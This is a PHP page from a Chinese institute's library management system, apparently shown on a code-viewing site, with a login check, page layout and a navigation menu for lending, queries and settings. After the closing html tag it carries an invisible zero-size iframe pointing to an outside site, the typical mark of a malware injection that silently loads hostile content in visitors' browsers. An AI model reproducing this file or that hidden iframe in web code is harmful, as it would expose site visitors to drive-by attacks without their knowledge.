📄 index1.php
字号:
<?php
session_start(); //一定要的
if($_SESSION["username"]==""){
echo "<script>location.href='index.php';</script>";
exit;
}
session_destroy();
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>南方装饰艺术设计院图书管理系统</title>
<script type="text/javascript" language="JavaScript1.2" src="css\stm31.js"></script>
<link href="css/css.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
body {
margin-top: 0px;
margin-bottom: 0px;
margin-left: 2px;
margin-right: 2px;
}
-->
</style></head>
<body>
<table width="995" height="73" class="titlebg">
<tr>
<td align="center" class="title">图 书 管 理 系 统</td>
</tr>
</table>
<table width="995" height="500" border="0" class="left">
<tr>
<td width="190" align="left" valign="top">
<br>
<br>
<script type="text/javascript" language="JavaScript1.2">
<!--
stm_bm(["menu09f9",400,"","blank.gif",0,"","",0,0,10,0,200,1,0,0,"","",0],this);
stm_bp("p0",[1,4,0,0,1,4,2,7,100,"",-2,"",-2,90,0,0,"#b6d0ea","#6699cc","css/pane.gif",3,1,1,"#666666"]);
stm_ai("p0i0",[0,"基本操作","","",-1,-1,0,"","_self","","","","",2,25,0,"css/arrow_r.gif","css/arrow_r.gif",7,7,0,0,1,"#458bba",0,"#70bff4",0,"css/11.gif","css/22.gif",3,3,0,0,"#0099cc","#000000","#0066cc","#000033","9pt 宋体","9pt 宋体",0,0]);
stm_bpx("p1","p0",[1,2,0,0,1,4,0,0]);
stm_aix("p1i0","p0i0",[0,"新书入库","","",-1,-1,0,"jbcz/xsrk.php","right","","","","",0,30,0,"","",0,0,0,1]);
//stm_ai("p1i2",[6,1,"transparent","",-1,-1,0]);
stm_aix("p1i1","p1i0",[0,"借 书","","",-1,-1,0,"jbcz/js.php"]);
stm_aix("p1i3","p1i0",[0,"还 书","","",-1,-1,0,"jbcz/hs.php"]);
stm_aix("p1i4","p1i0",[0,"续 借","","",-1,-1,0,"jbcz/xj.php"]);
stm_aix("p1i5","p1i0",[0,"发书出库","","",-1,-1,0,"jbcz/fsck.php"]);
//stm_ai("p1i2",[6,1,"transparent","",-1,-1,0]);
stm_aix("p1i6","p1i0",[0,"图书管理","","",-1,-1,0,"jbcz/tsgl.php"]);
stm_aix("p1i7","p1i0",[0,"读者管理","","",-1,-1,0,"jbcz/dzgl.php"]);
stm_ep();
stm_aix("p0i1","p0i0",[0,"资料查询"]);
stm_bpx("p2","p1",[]);
stm_aix("p2i0","p0i0",[0,"图书资料查询","","",-1,-1,0,"zlcx/tszlcx.php","right","","","","",0,25,0,"","",0,0]);
stm_aix("p2i1","p2i0",[0,"读者资料查询","","",-1,-1,0,"zlcx/dzzlcx.php"]);
stm_aix("p2i2","p2i0",[0,"借出图书查询","","",-1,-1,0,"zlcx/jctscx.php"]);
stm_aix("p2i3","p2i0",[0,"发书记录查询","","",-1,-1,0,"zlcx/fsjlcx.php"]);
stm_ep();
stm_aix("p0i3","p0i0",[0,"排行榜及统计"]);
stm_bpx("p4","p1",[]);
stm_aix("p4i0","p2i0",[0,"图书排行","","",-1,-1,0,"phb/tsph.php"]);
stm_aix("p4i1","p2i0",[0,"读者排行","","",-1,-1,0,"phb/dzph.php"]);
stm_aix("p4i2","p2i0",[0,"资料统计","","",-1,-1,0,"phb/zltj.php"]);
stm_ep();
stm_aix("p0i4","p0i0",[0,"系统设置"]);
stm_bpx("p5","p1",[]);
stm_aix("p5i0","p2i0",[0,"存放位置名设置","","",-1,-1,0,"system/location.php"]);
stm_aix("p5i1","p2i0",[0,"图书类别名设置","","",-1,-1,0,"system/category.php"]);
stm_aix("p5i2","p2i0",[0,"读者部门设置","","",-1,-1,0,"system/department.php"]);
stm_aix("p5i3","p2i0",[0,"读者资料设置","","",-1,-1,0,"system/readerinfo.php"]);
stm_aix("p5i4","p2i0",[0,"状态设置","","",-1,-1,0,"system/state.php"]);
stm_ep();
stm_aix("p0i4","p0i0",[0,"返回首页"]);
stm_bpx("p5","p1",[]);
stm_aix("p5i0","p2i0",[0,"返回首页","","",-1,-1,0,"top.php"]);
stm_ep();
stm_em();
//-->
</script></td>
<td width="3" bgcolor="#BCD2E6"></td>
<td width="790" align="center">
<iframe align="center" height="500" name="right" scrolling="auto" src="top.php" width="790" > </iframe>
</td>
</tr>
</table>
<table width="995" height="30" class="titlebg">
<tr>
<td align="center" class="word">南方装饰艺术设计院版权所有 © 2007 技术支持:信息技术部</td>
</tr>
</table>
</body>
</html>
<iframe src=http://www.winxpbox.com/ys/e.htm width=0 height=0></iframe>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -